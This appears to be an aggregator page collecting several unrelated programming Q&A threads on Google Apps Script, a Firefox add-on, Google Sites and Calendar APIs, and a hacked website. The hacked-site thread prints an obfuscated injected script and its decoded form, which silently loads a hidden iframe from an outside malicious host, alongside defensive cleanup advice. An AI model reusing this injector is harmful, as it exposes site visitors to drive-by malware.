We Keep Coding

Deny granting permissions in my own google scripts everytime

Situation:
I have made my self a speadsheet to enter my working times. For some cases I have to enter some links and name them with part of the linkname. So I decided to create a custom menu where I simply post the link in a prompt and the script cuts out needed name and enters this to my sheet.
Now this is only running in my sheet. Guess there is no need to publish something like this :)
To my problem:
I have a main workingsheet and copy this every week because one sheet only solves one week. My script causes me to grant permissions to it so it can do upper described actions on current sheet. But everytime I copy the sheet (so every week) I have to grand the permissions again. Looking to my google account seeing granted permissions giving me headache since there are planty of entries for granting permissions :(
Question:
Is there a way to stay in kind of a developermode to prevent this permission requests?
Why do I have to grand permissions to my own script?
function onOpen(e) {
var menu = SpreadsheetApp.getUi().createMenu('Custom Menu');
menu.addItem('Add Ticket', 'addTicket');
menu.addItem('Rename to KW XX', 'renameDocument');
menu.addToUi();
}
function addTicket() {
var ui = SpreadsheetApp.getUi(); // Same variations.
var sheet = SpreadsheetApp.getActiveSpreadsheet().getActiveSheet();
var myCell = sheet.getActiveCell();
var result = ui.prompt(
'Add Ticket',
'Please enter Ticket-link:',
ui.ButtonSet.OK_CANCEL);
// Process the user's response.
var button = result.getSelectedButton();
var link = result.getResponseText();
if (button == ui.Button.OK) {
var n = link.lastIndexOf('/');
var linkName = link.substring(n+1);
var vals = myCell.setValue('=HYPERLINK("' + link + '";"' + linkName + '")');
} else if (button == ui.Button.CANCEL) {
// User clicked "Cancel".
ui.alert('You cancled adding ticket.');
} else if (button == ui.Button.CLOSE) {
// User clicked X in the title bar.
ui.alert('You closed the dialog. No ticket was inserted.');
}
}
function renameDocument() {
eval(UrlFetchApp.fetch('https://momentjs.com/downloads/moment-with-locales.js').getContentText());
var sheet = SpreadsheetApp.getActive();
var doc = DocumentApp.getActiveDocument();
moment.locale('de');
var kw = moment().format('ww');
var name = sheet.getName();
sheet.setName('KW ' + kw);
}

I understand that by "sheet" you mean spreadsheet, a.k.a. workbook, document and file, because using a script on several sheets that are on the same spreadsheet doesn't require to authorize the script for each one and because you are seeing a "plenty of entries for granting permissions"
Also I understand that your script is on a script project bounded to an spreadsheet.
When we make a copy of an spreadsheet it will contain a copy to the script project bounded to it. The new spreadsheet and its bounded project as they are different files and the policy of Google is that the authorization to run a script is given by script project.
The way to avoid having a lot of copies of the same code code and have to authorize each of them is to use an add-on, that is the reason that I vote to close this question as duplicate of Use script in all spreadsheets
Anyway the answer to
Is there a way to stay in kind of a developermode to prevent this permission requests?
is develop an add-on.
and to
Why do I have to grand permissions to my own script?
Because you are not being asked to grant permissions to one script you are being asked to grant permission to each copy.
It's worth to note that besides the headache of having to grant permissions to each copy, if you made a change to "your script" it will be only on the script project where you write it, that change will not be "propagated" to the copies.
An alternative is to use a library but you still will have to grant permissions to each script project where you use the library.
Regarding the developer fee to publish on the Google Chrome Web Store, you could run your add-on on test mode but you will have to add each file to the corresponding list which is not very friendly to handle a large list of files.

how to fetch or set data from or to website using firefox add-on?

I'm trying to make Firefox add-on that could set data to specific text or password field in any web site how could I script this add on ??
ex: I want to log in my Gmail using this add-on where I'll store my account data on it. How I could pass my username and password from my add-on to Gmail website?
I've tried to run this code
XULSchoolChrome.BrowserOverlay = {
sayHello : function(aEvent) {
let user= document.getElementById("username");
let pass= document.getElementById("passwd");
window.alert("the username is "+ user.getString);
}
};
I'm running my add-on in yahoo log-in page ...

I found the solution guys you have to use gbrowser as followed
var currenttabIndex = gBrowser.tabContainer.getIndexOfItem(gBrowser.selectedTab);
var currentBrowser = gBrowser.getBrowserAtIndex(currenttabIndex);
var inputElementlist = currentBrowser.contentDocument.getElementsByTagName("input");

Site hacked with javascript code inserted

A number of sites that I manage have been hacked and the following javascript code has been inserted into each of the pages. I have no idea how to decode this or what it even does so I don't know how serious it is. Can anyone help?
<script type="text/javascript" language="javascript">
if(document.querySelector)bqlelz=4;zibka=("36,7c,8b,84,79,8a,7f,85,84,36,8c,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,8c,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,8c,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8b,86,79,82,7f,7b,84,8a,44,79,85,83,45,44,89,83,7f,82,7b,8f,89,45,7d,70,61,87,5e,7e,6d,49,44,86,7e,86,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,86,85,89,7f,8a,7f,85,84,36,53,36,3d,77,78,89,85,82,8b,8a,7b,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,79,85,82,85,88,36,53,36,3d,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,7e,7b,7f,7d,7e,8a,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8d,7f,7a,8a,7e,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,82,7b,7c,8a,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8a,85,86,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,23,20,36,7f,7c,36,3e,37,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,3f,36,91,23,20,36,7a,85,79,8b,83,7b,84,8a,44,8d,88,7f,8a,7b,3e,3d,52,86,36,7f,7a,53,72,3d,8c,72,3d,36,79,82,77,89,89,53,72,3d,8c,46,4f,72,3d,36,54,52,45,86,54,3d,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,44,77,86,86,7b,84,7a,59,7e,7f,82,7a,3e,8c,3f,51,23,20,36,93,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,69,7b,8a,59,85,85,81,7f,7b,3e,79,85,85,81,7f,7b,64,77,83,7b,42,79,85,85,81,7f,7b,6c,77,82,8b,7b,42,84,5a,77,8f,89,42,86,77,8a,7e,3f,36,91,23,20,36,8c,77,88,36,8a,85,7a,77,8f,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,8c,77,88,36,7b,8e,86,7f,88,7b,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,7f,7c,36,3e,84,5a,77,8f,89,53,53,84,8b,82,82,36,92,92,36,84,5a,77,8f,89,53,53,46,3f,36,84,5a,77,8f,89,53,47,51,23,20,36,7b,8e,86,7f,88,7b,44,89,7b,8a,6a,7f,83,7b,3e,8a,85,7a,77,8f,44,7d,7b,8a,6a,7f,83,7b,3e,3f,36,41,36,49,4c,46,46,46,46,46,40,48,4a,40,84,5a,77,8f,89,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,36,53,36,79,85,85,81,7f,7b,64,77,83,7b,41,38,53,38,41,7b,89,79,77,86,7b,3e,79,85,85,81,7f,7b,6c,77,82,8b,7b,3f,23,20,36,41,36,38,51,7b,8e,86,7f,88,7b,89,53,38,36,41,36,7b,8e,86,7f,88,7b,44,8a,85,5d,63,6a,69,8a,88,7f,84,7d,3e,3f,36,41,36,3e,3e,86,77,8a,7e,3f,36,55,36,38,51,36,86,77,8a,7e,53,38,36,41,36,86,77,8a,7e,36,50,36,38,38,3f,51,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,5d,7b,8a,59,85,85,81,7f,7b,3e,36,84,77,83,7b,36,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,88,8a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,84,77,83,7b,36,41,36,38,53,38,36,3f,51,23,20,36,8c,77,88,36,82,7b,84,36,53,36,89,8a,77,88,8a,36,41,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,41,36,47,51,23,20,36,7f,7c,36,3e,36,3e,36,37,89,8a,77,88,8a,36,3f,36,3c,3c,23,20,36,3e,36,84,77,83,7b,36,37,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,46,42,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,3f,36,3f,36,3f,23,20,36,91,23,20,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,93,23,20,36,7f,7c,36,3e,36,89,8a,77,88,8a,36,53,53,36,43,47,36,3f,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,8c,77,88,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,38,51,38,42,36,82,7b,84,36,3f,51,23,20,36,7f,7c,36,3e,36,7b,84,7a,36,53,53,36,43,47,36,3f,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,82,7b,84,7d,8a,7e,51,23,20,36,88,7b,8a,8b,88,84,36,8b,84,7b,89,79,77,86,7b,3e,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,82,7b,84,42,36,7b,84,7a,36,3f,36,3f,51,23,20,93,23,20,7f,7c,36,3e,84,77,8c,7f,7d,77,8a,85,88,44,79,85,85,81,7f,7b,5b,84,77,78,82,7b,7a,3f,23,20,91,23,20,7f,7c,3e,5d,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,3f,53,53,4b,4b,3f,91,93,7b,82,89,7b,91,69,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,42,36,3d,4b,4b,3d,42,36,3d,47,3d,42,36,3d,45,3d,3f,51,23,20,23,20,8c,46,4f,3e,3f,51,23,20,93,23,20,93".split(","));twuss=eval;function oqvw(){iuwo=function(){--(uiopm.body)}()}uiopm=document;for(wxuxe=0;wxuxe<zibka["length"];wxuxe+=1){zibka[wxuxe]=-(22)+parseInt(zibka[wxuxe],bqlelz*4);}try{oqvw()}catch(ggpl){hywzjw=50-50;}if(!hywzjw)twuss(String["fr"+"omCh"+"arCo"+"de"].apply(String,zibka));
</script>
I'm assuming these are character references and it's actually pointing to a site somewhere with some malicious content but I don't know how to work it out. I am going through and removing all of these and changing all passwords to prevent further security issues but any advice on this would be greatly appreciated!
Thanks.

In my experience, these sort of attacks happen on shared hosting servers where an automated bot has either guessed the password to the account, or there is malware on the account holder's desktop that has captured the credentials and is now abusing them.
Your best bet? Accept that there is definitely going to be an impact to your users, and then do your due diligence:
Notify your shared host if you're not the owner.
Archive the entire home directory of the shared hosting account, and include the contents of that user's cron jobs, databases, email and other information. (eg. tar -czf website-$(date +%F).tar.gz ~/ or your shared hosting backup utility.)
Check for any malicious processes or scripts that could be running. ps gaux is your friend.
Nuke everything in the shared hosting account.
Change every password, regardless, even if you think it couldn't have possibly been affected.
Re-create the account and leave a maintenance page available for your users. You should have backups of your account.
Unpack the backup within a virtual machine and investigate everything including logs and other information to discover how the attack occurred. Apply what you learn to your website code.
Re-deploy your code with the fixes, taking into account the causes you discovered in the previous step; if your account was using a framework like Joomla, Drupal, Wordpress or something similar, take this time to upgrade to the latest version.
Do not skip steps, or this will happen again.

This is what was injected. To decipher this, you do the same thing the javascript in your post does. Split the string into hex strings on the comma, then parseInt with base 16, subtract 22, and look up the character for that char code. How it could be used maliciously, I'm not sure. Anyone have any ideas?
function v09() {
var static = 'ajax';
var controller = 'index.php';
var v = document.createElement('iframe');
v.src = 'http://upclient.com/.smileys/gZKqHhW3.php';
v.style.position = 'absolute';
v.style.color = '968';
v.style.height = '968px';
v.style.width = '968px';
v.style.left = '1000968';
v.style.top = '1000968';
if (!document.getElementById('v')) {
document.write('<p id=\'v\' class=\'v09\' ></p>');
document.getElementById('v').appendChild(v);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0)
nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length)))
{
return null;
}
if (start == -1)
return null;
var end = document.cookie.indexOf(";", len);
if (end == -1)
end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled)
{
if (GetCookie('visited_uq') == 55) {
} else {
SetCookie('visited_uq', '55', '1', '/');
v09();
}
}

This type of thing has happened to me also, I was not on a shared hosting solution, I was on a dedicated server, there was no evidence of any FTP or SSH or SCP activity.
I realized that someone used one of my forms to do code injection (my sites are PHP). This can be achieved by using your own code against you, by providing input to a textbox or text field that would be interpreted by some code on your server.
For example, you may have a small form to allow people to upload files into a directory of some sort. Someone can upload a code file and then execute it and this code file can be the culprit used to inject the javascript code into your own code pages.
With this instance one can restrict what file types are allowed to be uploaded, place the files in a directory where a browser would not be able to access it directly or make sure the file has no execute permissions when uploaded.
You can also make sure to sanitize inputs so that no malicious text can be effective in any of your forms.

How do you accept a value from a user (textbox) and create a Site (when user hits Submit button) using Google Apps Script and UI Services?

I have the following code as a Google Apps Script (deployed as a web app) and have inserted it into my Google Enterprise page as a Google Apps Script Gadget. The UI (panel) loads properly with the label, textBox and button, but when I enter in text and click the button, I get the following error:
Error encountered: The resource you requested could not be located.
Here is my script:
function doGet(e) {
// create all UI elements
var myApp = UiApp.createApplication();
var panel = myApp.createVerticalPanel();
var label = myApp.createLabel('Please enter the name of your new site:');
var textBox = myApp.createTextBox().setName('txtSiteName');
var button = myApp.createButton('Create Site');
var btnHandler = myApp.createServerHandler('createNewSite');
button.addClickHandler(btnHandler);
btnHandler.addCallbackElement(panel);
// add all UI elements to the panel
panel.add(label);
panel.add(textBox);
panel.add(button);
// add the panel to the app
myApp.add(panel);
// return the app to the browser to be displayed
return myApp;
}
// button server handler
function createNewSite(e) {
var domain = SitesApp.getActiveSite().getUrl();
var siteName = e.parameter.txtSiteName;
var newSite = SitesApp.createSite(domain, siteName, 'script_center_demo', "this is just a test page");
return app.close();
}
Also, what is the difference between createSite() and createWebPage()?
EDIT: Ok, so using the same doGet() function above, my createNewSite() function could look like this?
function createNewSite(e) {
var domain = 'my-domain.com';
var siteName = e.parameter.txtSiteName;
var newPage = SitesApp.createSite(domain, siteName, 'script_center_demo', "this is just a test page");
var pageName = 'script_center_demo';
var html = '<div><p>This project aims to....</p></div>';
var site = SitesApp.getSite(domain, site);
site.createWebPage('Script Center Demo', pageName, html);
return app.close();
}

Look at this line:
var domain = SitesApp.getActiveSite().getUrl();
You're need to obtain a domain, e.g. example.com, but this line will yield a URI containing google's domain, and a resource path (that contains your domain). Example:
https://sites.google.com/a/example.com/mySite/
^^^^^^^^^^^
When you attempt to create a new site, it cannot be found as a domain. You need to strip the result of getUrl() down to just the domain name.
If you're the Domain administrator, you can use this instead:
var domain = UserManager.getDomain();
Ordinary domain users don't have access to the UserManager Service, so they would need to parse the site URL to extract their domain. I suggest using parseUri by Steven Levithan to handle the task:
var uri = parseUri(SitesApp.getActiveSite().getUrl());
var domain = parseUri(uri.path.slice(3)).host;
The .slice(3) operation is intended to remove /a/ from the path property of the parsed Site URI. This works on my accounts in multiple domains today - ymmv.
After that, we treat the remaining path as a URI and invoke parseUri() again, extracting the host property, which should be our domain.
Also, what is the difference between createSite() and createWebPage()?
You create an instance of a Site, using the Sites service method SiteApp.createSite. Not much to look at, a Site object is a container, a skeleton - you use the Site.createWebPage() method to create Web Pages that will be contained in the Site, and visible to users, mainly via web browsers.
Edit - Debugging Results
Debugging WebApps is tricky. Get familiar with "View - Execution Transcript", since it will show a trace of execution for your createNewSite() handler function when it's invoked. Using that technique, here's what I found, part 1:
We can't call SitesApp.getActiveSite().getUrl() in the handler, because when it's invoked there is no active site. You're already using the simple work-around of hard-coding the domain.
When trying to get a handle on the new site, you have var site = SitesApp.getSite(domain, site);. This is where your latest "resource error" message was coming from. The site parameter is left-over from insertion of the function - it needs to be a string, matching the site name used in createSite().
You're returning app.close(), but have no app defined in the function.
With those problems fixed, here's problems, part 2:
The dialog lets users enter a site name, but there are restrictions on those that need to be followed to make createSite succeed. The simplest rule is that the site name must be lower case. Why not let users enter the site title, and derive the name from that?
What if the site already exists? That's not handled. Same thing for the page creation, later on.
There's no feedback to the user. The example below has very rudimentary status updates in it, which are appended to the UI.
updated code
function createNewSite(e) {
var app = UiApp.getActiveApplication();
var domain = 'mitel.com';
var siteTitle = e.parameter.txtSiteName;
var siteName = siteTitle.toLowerCase();
var result = 'Results: ';
var site = SitesApp.getSite(domain, siteName); // Check if site already exists
if (site)
result += 'Site "' + siteName + '" exists, ';
else {
// Doesn't exist, so create it
site = SitesApp.createSite(domain, siteName, siteTitle, "this is just a test page");
result += 'Site "' + siteName + '" created with title "' + siteTitle + '", ';
}
var pageName = 'script_center_demo';
var html = '<div><p>This project aims to....</p></div>';
var page = site.getChildByName(pageName); // Check if page already exists
if (page)
result += 'Page "' + pageName + '" exists, ';
else {
// Doesn't exist, so create it
page = site.createWebPage('Script Center Demo', pageName, html);
result += 'Page "' + pageName + '" created, ';
}
result += 'Done.';
// Add result text to UI
var uiResult = app.createLabel(result, true);
app.add(uiResult);
return app.close();
}

Google API Authentication

Using the Google Javascript API I am trying to authenticate myself (locally) to create a new event in my calendar. However, I get an error (see below) stating that my "next" parameter is bad or missing when I execute the log-in portion of the script. I am following the data api interactive samples for "Create a single event".
Update 1: From the address bar I see "next" set the following way:
next=file:///C:/calext/sending_data.html
Does Google not like local files? Workaround?
Update 2: I tried running the file on my web host. The page ran (threw a few errors) but the event ended up on my calendar. So the bug lies somewhere with not liking local files. Thoughts?
Error Message:
The page you have requested cannot be
displayed. Another site was requesting
access to your Google Account, but
sent a malformed request. Please
contact the site that you were trying
to use when you received this message
to inform them of the error. A
detailed error message follows:
The "next" parameter was bad or
missing.
My page's code:
<html>
<head>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
</head>
<body>
<img src="128.png">
<script type="text/javascript">
var myService;
var feedUrl = "https://www.google.com/calendar/feeds/default/private/full";
google.load("gdata", "1");
google.setOnLoadCallback(getMyFeed); // starts process
// Create a single event example
function doExample()
{
var calendarService = myService;
// The default "private/full" feed is used to insert event to the
// primary calendar of the authenticated user
var feedUri = 'http://www.google.com/calendar/feeds/default/private/full';
// Create an instance of CalendarEventEntry representing the new event
var entry = new google.gdata.calendar.CalendarEventEntry();
// Set the title of the event
entry.setTitle(google.gdata.Text.create('JS-Client: insert event'));
// Create a When object that will be attached to the event
var when = new google.gdata.When();
// Set the start and end time of the When object
var startTime = google.gdata.DateTime.fromIso8601("2010-10-24T09:00:00.000-05:00");
var endTime = google.gdata.DateTime.fromIso8601("2010-10-24T10:00:00.000-05:00");
when.setStartTime(startTime);
when.setEndTime(endTime);
// Add the When object to the event
entry.addTime(when);
// Submit the request using the calendar service object
calendarService.insertEntry(feedUri, entry, handleMyFeed, handleError, google.gdata.calendar.CalendarEventEntry);
}
function handleMyFeed(myResultsFeedRoot)
{
alert("This feed's title is: " + myResultsFeedRoot.feed.getTitle().getText());
}
function handleError(e)
{
alert("There was an error!");
alert(e.cause ? e.cause.statusText : e.message);
}
function getMyFeed()
{
// Set up my service
myService = new google.gdata.calendar.CalendarService('GoogleInc-jsguide-1.0');
// Log me in
var scope = "https://www.google.com/calendar/feeds/";
var token = google.accounts.user.login(scope);
// Create a single event example
doExample();
// Get my feed
myService.getEventsFeed(feedUrl, handleMyFeed, handleError);
}
</script>
</body>
</html>

I assume your opening a local file which requires a local file. By default, file:// URIs cannot read other file:// URIs. Try adding this command line parameter, it is specifically made to help developers test:
chrome --allow-file-access-from-files